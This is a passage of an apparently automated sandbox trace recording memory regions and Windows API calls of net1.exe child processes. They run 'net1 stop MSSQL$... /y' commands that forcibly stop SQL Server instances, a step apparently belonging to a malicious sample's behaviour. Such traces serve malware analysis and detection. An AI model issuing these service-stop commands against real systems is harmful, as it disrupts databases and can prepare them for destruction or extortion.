end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7692 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7693 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7694 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7695 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7696 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7743 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 630 os_tid = 0x590 [0103.467] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xaf9f0 | out: lpSystemTimeAsFileTime=0xaf9f0*(dwLowDateTime=0xf2d722f0, dwHighDateTime=0x1d48689)) [0103.467] GetCurrentProcessId () returned 0x1340 [0103.467] GetCurrentThreadId () returned 0x590 [0103.467] GetTickCount () returned 0x23a12 [0103.467] QueryPerformanceCounter (in: lpPerformanceCount=0xaf9f8 | out: lpPerformanceCount=0xaf9f8*=1815038600000) returned 1 [0103.469] GetModuleHandleW (lpModuleName=0x0) returned 0xff970000 [0103.469] __set_app_type (_Type=0x1) [0103.469] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff989c9c) returned 0x0 [0103.469] __getmainargs (in: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788, _DoWildCard=0, _StartInfo=0xff99479c | out: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788) returned 0 [0103.469] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.469] GetConsoleOutputCP () returned 0x1b5 [0103.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff99cec0 | out: lpCPInfo=0xff99cec0) returned 1 [0103.488] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0103.493] sprintf_s (in: _DstBuf=0xaf998, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.493] setlocale (category=0, locale=".437") returned="English_United States.437" [0103.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.498] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0103.498] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PRACTICEMGT /y" [0103.498] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xaf730, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0103.498] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0103.498] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xaf988 | out: Buffer=0xaf988*=0x1e4d60) returned 0x0 [0103.498] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xaf988 | out: Buffer=0xaf988*=0x1ec120) returned 0x0 [0103.498] _fileno (_File=0x7fefdba2a80) returned 0 [0103.498] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0103.499] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0103.499] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0103.499] _wcsicmp (_String1="config", _String2="stop") returned -16 [0103.499] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0103.499] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0103.499] _wcsicmp (_String1="file", _String2="stop") returned -13 [0103.499] _wcsicmp (_String1="files", _String2="stop") returned -13 [0103.499] _wcsicmp (_String1="group", _String2="stop") returned -12 [0103.499] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0103.499] _wcsicmp (_String1="help", _String2="stop") returned -11 [0103.499] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0103.499] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0103.499] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0103.499] _wcsicmp (_String1="session", _String2="stop") returned -15 [0103.499] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0103.499] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0103.499] _wcsicmp (_String1="share", _String2="stop") returned -12 [0103.499] _wcsicmp (_String1="start", _String2="stop") returned -14 [0103.499] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0103.500] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0103.500] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0103.500] _wcsicmp (_String1="accounts", _String2="MSSQL$PRACTICEMGT") returned -12 [0103.500] _wcsicmp (_String1="computer", _String2="MSSQL$PRACTICEMGT") returned -10 [0103.500] _wcsicmp (_String1="config", _String2="MSSQL$PRACTICEMGT") returned -10 [0103.500] _wcsicmp (_String1="continue", _String2="MSSQL$PRACTICEMGT") returned -10 [0103.500] _wcsicmp (_String1="cont", _String2="MSSQL$PRACTICEMGT") returned -10 [0103.500] _wcsicmp (_String1="file", _String2="MSSQL$PRACTICEMGT") returned -7 [0103.500] _wcsicmp (_String1="files", _String2="MSSQL$PRACTICEMGT") returned -7 [0103.500] _wcsicmp (_String1="group", _String2="MSSQL$PRACTICEMGT") returned -6 [0103.500] _wcsicmp (_String1="groups", _String2="MSSQL$PRACTICEMGT") returned -6 [0103.500] _wcsicmp (_String1="help", _String2="MSSQL$PRACTICEMGT") returned -5 [0103.500] _wcsicmp (_String1="helpmsg", _String2="MSSQL$PRACTICEMGT") returned -5 [0103.500] _wcsicmp (_String1="localgroup", _String2="MSSQL$PRACTICEMGT") returned -1 [0103.500] _wcsicmp (_String1="pause", _String2="MSSQL$PRACTICEMGT") returned 3 [0103.500] _wcsicmp (_String1="session", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.500] _wcsicmp (_String1="sessions", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.500] _wcsicmp (_String1="sess", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.500] _wcsicmp (_String1="share", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.501] _wcsicmp (_String1="start", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.501] _wcsicmp (_String1="stats", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.501] _wcsicmp (_String1="statistics", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.501] _wcsicmp (_String1="stop", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.501] _wcsicmp (_String1="time", _String2="MSSQL$PRACTICEMGT") returned 7 [0103.501] _wcsicmp (_String1="user", _String2="MSSQL$PRACTICEMGT") returned 8 [0103.501] _wcsicmp (_String1="users", _String2="MSSQL$PRACTICEMGT") returned 8 [0103.501] _wcsicmp (_String1="msg", _String2="MSSQL$PRACTICEMGT") returned -12 [0103.501] _wcsicmp (_String1="messenger", _String2="MSSQL$PRACTICEMGT") returned -14 [0103.501] _wcsicmp (_String1="receiver", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.501] _wcsicmp (_String1="rcv", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.501] _wcsicmp (_String1="netpopup", _String2="MSSQL$PRACTICEMGT") returned 1 [0103.501] _wcsicmp (_String1="redirector", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.501] _wcsicmp (_String1="redir", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.501] _wcsicmp (_String1="rdr", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.501] _wcsicmp (_String1="workstation", _String2="MSSQL$PRACTICEMGT") returned 10 [0103.501] _wcsicmp (_String1="work", _String2="MSSQL$PRACTICEMGT") returned 10 [0103.501] _wcsicmp (_String1="wksta", _String2="MSSQL$PRACTICEMGT") returned 10 [0103.501] _wcsicmp (_String1="prdr", _String2="MSSQL$PRACTICEMGT") returned 3 [0103.501] _wcsicmp (_String1="devrdr", _String2="MSSQL$PRACTICEMGT") returned -9 [0103.502] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PRACTICEMGT") returned -1 [0103.502] _wcsicmp (_String1="server", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.502] _wcsicmp (_String1="svr", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.502] _wcsicmp (_String1="srv", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.502] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PRACTICEMGT") returned -1 [0103.502] _wcsicmp (_String1="alerter", _String2="MSSQL$PRACTICEMGT") returned -12 [0103.502] _wcsicmp (_String1="netlogon", _String2="MSSQL$PRACTICEMGT") returned 1 [0103.502] _wcsupr (in: _String="MSSQL$PRACTICEMGT" | out: _String="MSSQL$PRACTICEMGT") returned="MSSQL$PRACTICEMGT" [0103.502] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1ece30 [0103.518] GetServiceKeyNameW (in: hSCManager=0x1ece30, lpDisplayName="MSSQL$PRACTICEMGT", lpServiceName=0xff995750, lpcchBuffer=0xaf8a8 | out: lpServiceName="", lpcchBuffer=0xaf8a8) returned 0 [0103.519] _wcsicmp (_String1="msg", _String2="MSSQL$PRACTICEMGT") returned -12 [0103.519] _wcsicmp (_String1="messenger", _String2="MSSQL$PRACTICEMGT") returned -14 [0103.519] _wcsicmp (_String1="receiver", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.520] _wcsicmp (_String1="rcv", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.520] _wcsicmp (_String1="redirector", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.520] _wcsicmp (_String1="redir", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.520] _wcsicmp (_String1="rdr", _String2="MSSQL$PRACTICEMGT") returned 5 [0103.520] _wcsicmp (_String1="workstation", _String2="MSSQL$PRACTICEMGT") returned 10 [0103.520] _wcsicmp (_String1="work", _String2="MSSQL$PRACTICEMGT") returned 10 [0103.520] _wcsicmp (_String1="wksta", _String2="MSSQL$PRACTICEMGT") returned 10 [0103.520] _wcsicmp (_String1="prdr", _String2="MSSQL$PRACTICEMGT") returned 3 [0103.520] _wcsicmp (_String1="devrdr", _String2="MSSQL$PRACTICEMGT") returned -9 [0103.520] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PRACTICEMGT") returned -1 [0103.520] _wcsicmp (_String1="server", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.520] _wcsicmp (_String1="svr", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.520] _wcsicmp (_String1="srv", _String2="MSSQL$PRACTICEMGT") returned 6 [0103.520] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PRACTICEMGT") returned -1 [0103.520] _wcsicmp (_String1="alerter", _String2="MSSQL$PRACTICEMGT") returned -12 [0103.520] _wcsicmp (_String1="netlogon", _String2="MSSQL$PRACTICEMGT") returned 1 [0103.520] NetServiceControl (in: servername=0x0, service="MSSQL$PRACTICEMGT", opcode=0x0, arg=0x0, bufptr=0xaf8b0 | out: bufptr=0xaf8b0) returned 0x889 [0103.521] wcscpy_s (in: _Destination=0xff9980d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0103.522] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0103.522] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0103.523] GetFileType (hFile=0xb) returned 0x2 [0103.524] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf778 | out: lpMode=0xaf778) returned 1 [0103.524] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xaf770, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0xaf770*=0x1e) returned 1 [0103.524] GetFileType (hFile=0xb) returned 0x2 [0103.524] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf778 | out: lpMode=0xaf778) returned 1 [0103.524] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xaf770, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0xaf770*=0x2) returned 1 [0103.525] _ultow (in: _Dest=0x889, _Radix=718816 | out: _Dest=0x889) returned="2185" [0103.525] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0103.525] GetFileType (hFile=0xb) returned 0x2 [0103.525] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf778 | out: lpMode=0xaf778) returned 1 [0103.525] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xaf770, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0xaf770*=0x34) returned 1 [0103.526] GetFileType (hFile=0xb) returned 0x2 [0103.526] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf778 | out: lpMode=0xaf778) returned 1 [0103.526] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xaf770, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0xaf770*=0x2) returned 1 [0103.527] NetApiBufferFree (Buffer=0x1e4d60) returned 0x0 [0103.527] NetApiBufferFree (Buffer=0x1ec120) returned 0x0 [0103.527] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PRACTICEMGT /y" [0103.527] exit (_Code=2) Process: id = "187" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x53dc0000" os_pid = "0x1e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "175" os_parent_pid = "0x9c0" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7605 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7606 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7607 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7608 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 7609 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7610 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7611 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7612 start_va = 0xff970000 end_va = 0xff9a2fff entry_point = 0xff970000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7613 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7614 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7615 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 7616 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7648 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 7649 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7650 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7651 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7652 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7653 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7654 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 7655 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 7656 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7657 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7658 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7659 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7660 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7661 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7662 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7663 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7664 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7665 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7666 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7667 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7668 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7669 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7670 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7671 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7672 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7673 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7744 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 631 os_tid = 0x1344 [0103.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc90 | out: lpSystemTimeAsFileTime=0x26fc90*(dwLowDateTime=0xf2cd9d70, dwHighDateTime=0x1d48689)) [0103.404] GetCurrentProcessId () returned 0x1e0 [0103.404] GetCurrentThreadId () returned 0x1344 [0103.404] GetTickCount () returned 0x239d4 [0103.404] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc98 | out: lpPerformanceCount=0x26fc98*=1815032200000) returned 1 [0103.406] GetModuleHandleW (lpModuleName=0x0) returned 0xff970000 [0103.406] __set_app_type (_Type=0x1) [0103.406] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff989c9c) returned 0x0 [0103.406] __getmainargs (in: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788, _DoWildCard=0, _StartInfo=0xff99479c | out: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788) returned 0 [0103.407] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.407] GetConsoleOutputCP () returned 0x1b5 [0103.531] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff99cec0 | out: lpCPInfo=0xff99cec0) returned 1 [0103.531] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0103.534] sprintf_s (in: _DstBuf=0x26fc38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.534] setlocale (category=0, locale=".437") returned="English_United States.437" [0103.535] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.535] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0103.535] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$ECWDB2 /y" [0103.535] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f9d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0103.536] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0103.536] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fc28 | out: Buffer=0x26fc28*=0x3b4d50) returned 0x0 [0103.536] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fc28 | out: Buffer=0x26fc28*=0x3bc100) returned 0x0 [0103.536] _fileno (_File=0x7fefdba2a80) returned 0 [0103.536] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0103.536] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0103.536] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0103.536] _wcsicmp (_String1="config", _String2="stop") returned -16 [0103.536] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0103.536] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0103.536] _wcsicmp (_String1="file", _String2="stop") returned -13 [0103.536] _wcsicmp (_String1="files", _String2="stop") returned -13 [0103.536] _wcsicmp (_String1="group", _String2="stop") returned -12 [0103.536] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0103.536] _wcsicmp (_String1="help", _String2="stop") returned -11 [0103.537] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0103.537] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0103.537] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0103.537] _wcsicmp (_String1="session", _String2="stop") returned -15 [0103.537] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0103.537] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0103.537] _wcsicmp (_String1="share", _String2="stop") returned -12 [0103.537] _wcsicmp (_String1="start", _String2="stop") returned -14 [0103.537] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0103.537] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0103.537] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0103.537] _wcsicmp (_String1="accounts", _String2="MSSQL$ECWDB2") returned -12 [0103.537] _wcsicmp (_String1="computer", _String2="MSSQL$ECWDB2") returned -10 [0103.537] _wcsicmp (_String1="config", _String2="MSSQL$ECWDB2") returned -10 [0103.537] _wcsicmp (_String1="continue", _String2="MSSQL$ECWDB2") returned -10 [0103.537] _wcsicmp (_String1="cont", _String2="MSSQL$ECWDB2") returned -10 [0103.537] _wcsicmp (_String1="file", _String2="MSSQL$ECWDB2") returned -7 [0103.537] _wcsicmp (_String1="files", _String2="MSSQL$ECWDB2") returned -7 [0103.537] _wcsicmp (_String1="group", _String2="MSSQL$ECWDB2") returned -6 [0103.537] _wcsicmp (_String1="groups", _String2="MSSQL$ECWDB2") returned -6 [0103.537] _wcsicmp (_String1="help", _String2="MSSQL$ECWDB2") returned -5 [0103.537] _wcsicmp (_String1="helpmsg", _String2="MSSQL$ECWDB2") returned -5 [0103.537] _wcsicmp (_String1="localgroup", _String2="MSSQL$ECWDB2") returned -1 [0103.537] _wcsicmp (_String1="pause", _String2="MSSQL$ECWDB2") returned 3 [0103.537] _wcsicmp (_String1="session", _String2="MSSQL$ECWDB2") returned 6 [0103.537] _wcsicmp (_String1="sessions", _String2="MSSQL$ECWDB2") returned 6 [0103.537] _wcsicmp (_String1="sess", _String2="MSSQL$ECWDB2") returned 6 [0103.537] _wcsicmp (_String1="share", _String2="MSSQL$ECWDB2") returned 6 [0103.537] _wcsicmp (_String1="start", _String2="MSSQL$ECWDB2") returned 6 [0103.537] _wcsicmp (_String1="stats", _String2="MSSQL$ECWDB2") returned 6 [0103.537] _wcsicmp (_String1="statistics", _String2="MSSQL$ECWDB2") returned 6 [0103.537] _wcsicmp (_String1="stop", _String2="MSSQL$ECWDB2") returned 6 [0103.538] _wcsicmp (_String1="time", _String2="MSSQL$ECWDB2") returned 7 [0103.538] _wcsicmp (_String1="user", _String2="MSSQL$ECWDB2") returned 8 [0103.538] _wcsicmp (_String1="users", _String2="MSSQL$ECWDB2") returned 8 [0103.538] _wcsicmp (_String1="msg", _String2="MSSQL$ECWDB2") returned -12 [0103.538] _wcsicmp (_String1="messenger", 